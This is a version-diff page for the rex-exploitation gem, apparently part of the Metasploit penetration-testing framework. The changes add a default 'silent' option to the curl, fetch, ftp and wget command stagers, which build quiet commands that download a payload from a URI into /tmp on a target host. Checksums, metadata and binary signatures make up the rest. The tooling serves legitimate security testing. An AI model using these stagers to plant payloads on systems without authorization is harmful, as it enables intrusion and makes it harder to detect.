rex-exploitation 0.1.37 → 0.1.38
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- checksums.yaml.gz.sig +0 -0
- data/lib/rex/exploitation/cmdstager/curl.rb +4 -2
- data/lib/rex/exploitation/cmdstager/fetch.rb +4 -2
- data/lib/rex/exploitation/cmdstager/ftp_http.rb +4 -1
- data/lib/rex/exploitation/cmdstager/wget.rb +4 -2
- data/lib/rex/exploitation/version.rb +1 -1
- data.tar.gz.sig +0 -0
- metadata +2 -2
- metadata.gz.sig +1 -1
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA256:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: dd288cd8a6368cbe9fdb09987c43eee0ea4345ba713c57e0b388c427a2faf100
|
4
|
+
data.tar.gz: 006413c195ac9266d5aeca6c2c03b73d5b0b0651bc3d9ad880d72dbde07cbf66
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: 8ba577dd6c6821b2451cb6a4a04eeb698361cce945b12d2951e33ed48c730b0f44c7dbf1535971aff3bfa55b859104fc6e254029b72e128ffb583229be0486b9
|
7
|
+
data.tar.gz: 1725bb216555d54137b426e5c1564c785d4c49ad7b27223a1b6fd2511105aafa617e8bcb9d9a0d3ef1e056758745b13114018ac8e45781a3f8a08418a22af89f
|
checksums.yaml.gz.sig
CHANGED
Binary file
|
@@ -17,6 +17,7 @@ class Rex::Exploitation::CmdStagerCurl < Rex::Exploitation::CmdStagerBase
|
|
17
17
|
|
18
18
|
opts[:temp] ||= '/tmp'
|
19
19
|
opts[:file] ||= Rex::Text.rand_text_alpha(8)
|
20
|
+
opts[:silent] = true if opts[:silent].nil?
|
20
21
|
@payload_path = "#{opts[:temp]}/#{opts[:file]}"
|
21
22
|
|
22
23
|
super
|
@@ -25,12 +26,13 @@ class Rex::Exploitation::CmdStagerCurl < Rex::Exploitation::CmdStagerBase
|
|
25
26
|
def generate_cmds_payload(opts)
|
26
27
|
cmds = []
|
27
28
|
uri = opts[:payload_uri]
|
29
|
+
silent_flag = opts[:silent] ? 's' : ''
|
28
30
|
|
29
31
|
if opts[:ssl]
|
30
|
-
cmds << "curl
|
32
|
+
cmds << "curl -#{silent_flag}ko #{@payload_path} #{uri}"
|
31
33
|
else
|
32
34
|
uri = uri.gsub(%r{^http://}, '') if opts[:no_proto]
|
33
|
-
cmds << "curl
|
35
|
+
cmds << "curl -#{silent_flag}o #{@payload_path} #{uri}"
|
34
36
|
end
|
35
37
|
|
36
38
|
cmds
|
@@ -17,6 +17,7 @@ class Rex::Exploitation::CmdStagerFetch < Rex::Exploitation::CmdStagerBase
|
|
17
17
|
|
18
18
|
opts[:temp] ||= '/tmp'
|
19
19
|
opts[:file] ||= Rex::Text.rand_text_alpha(8)
|
20
|
+
opts[:silent] = true if opts[:silent].nil?
|
20
21
|
@payload_path = "#{opts[:temp]}/#{opts[:file]}"
|
21
22
|
|
22
23
|
super
|
@@ -26,10 +27,11 @@ class Rex::Exploitation::CmdStagerFetch < Rex::Exploitation::CmdStagerBase
|
|
26
27
|
cmds = []
|
27
28
|
nvp = '--no-verify-peer'
|
28
29
|
|
30
|
+
silent_flag = opts[:silent] ? 'q' : ''
|
29
31
|
if opts[:ssl]
|
30
|
-
cmds << "fetch
|
32
|
+
cmds << "fetch -#{silent_flag}o #{@payload_path} #{nvp} #{opts[:payload_uri]}"
|
31
33
|
else
|
32
|
-
cmds << "fetch
|
34
|
+
cmds << "fetch -#{silent_flag}o #{@payload_path} #{opts[:payload_uri]}"
|
33
35
|
end
|
34
36
|
|
35
37
|
cmds
|
@@ -17,14 +17,17 @@ class Rex::Exploitation::CmdStagerFtpHttp < Rex::Exploitation::CmdStagerBase
|
|
17
17
|
|
18
18
|
opts[:temp] ||= '/tmp'
|
19
19
|
opts[:file] ||= Rex::Text.rand_text_alpha(8)
|
20
|
+
opts[:silent] = true if opts[:silent].nil?
|
20
21
|
@payload_path = "#{opts[:temp]}/#{opts[:file]}"
|
21
22
|
|
22
23
|
super
|
23
24
|
end
|
24
25
|
|
25
26
|
def generate_cmds_payload(opts)
|
27
|
+
# -V: disable verbose output (quiet mode)
|
28
|
+
silent_flag = opts[:silent] ? 'V' : ''
|
26
29
|
# -o: output file name (argument must be before URL)
|
27
|
-
["ftp
|
30
|
+
["ftp -#{silent_flag}o #{@payload_path} #{opts[:payload_uri]}"]
|
28
31
|
end
|
29
32
|
|
30
33
|
def generate_cmds_decoder(opts)
|
@@ -17,6 +17,7 @@ class Rex::Exploitation::CmdStagerWget < Rex::Exploitation::CmdStagerBase
|
|
17
17
|
|
18
18
|
opts[:temp] ||= '/tmp'
|
19
19
|
opts[:file] ||= Rex::Text.rand_text_alpha(8)
|
20
|
+
opts[:silent] = true if opts[:silent].nil?
|
20
21
|
@payload_path = "#{opts[:temp]}/#{opts[:file]}"
|
21
22
|
|
22
23
|
super
|
@@ -27,12 +28,13 @@ class Rex::Exploitation::CmdStagerWget < Rex::Exploitation::CmdStagerBase
|
|
27
28
|
|
28
29
|
uri = opts[:payload_uri]
|
29
30
|
ncc = '--no-check-certificate'
|
31
|
+
silent_flag = opts[:silent] ? 'q' : ''
|
30
32
|
|
31
33
|
if opts[:ssl]
|
32
|
-
cmds << "wget
|
34
|
+
cmds << "wget -#{silent_flag}O #{@payload_path} #{ncc} #{uri}"
|
33
35
|
else
|
34
36
|
uri = uri.gsub(%r{^http://}, '') if opts[:no_proto]
|
35
|
-
cmds << "wget
|
37
|
+
cmds << "wget -#{silent_flag}O #{@payload_path} #{uri}"
|
36
38
|
end
|
37
39
|
|
38
40
|
cmds
|
data.tar.gz.sig
CHANGED
Binary file
|
metadata
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: rex-exploitation
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version: 0.1.
|
4
|
+
version: 0.1.38
|
5
5
|
platform: ruby
|
6
6
|
authors:
|
7
7
|
- Metasploit Hackers
|
@@ -93,7 +93,7 @@ cert_chain:
|
|
93
93
|
EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
|
94
94
|
9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
|
95
95
|
-----END CERTIFICATE-----
|
96
|
-
date: 2023-
|
96
|
+
date: 2023-03-06 00:00:00.000000000 Z
|
97
97
|
dependencies:
|
98
98
|
- !ruby/object:Gem::Dependency
|
99
99
|
name: rake
|
metadata.gz.sig
CHANGED
@@ -1 +1 @@
|
|
1
|
-
|
1
|
+
e,A��kJ|��N.I6��Gg��r��<B�,n��d�6���M��9Kf���3�q�>_u�r�ĵC�}u�j��otc�C>���<�z`��S~�=J���֤`�(Jr���pM����;��� ��ީ�$b̤Ӳ�qZ���k�m/�h�B�G�N���b]��*�@���^��o�pQ�;��N�v!仮�AѺj���zQ�~M�c���?s�d��&���F�a�#_����p��p��8�X�ܹS^�XhY��e�ݤ,
|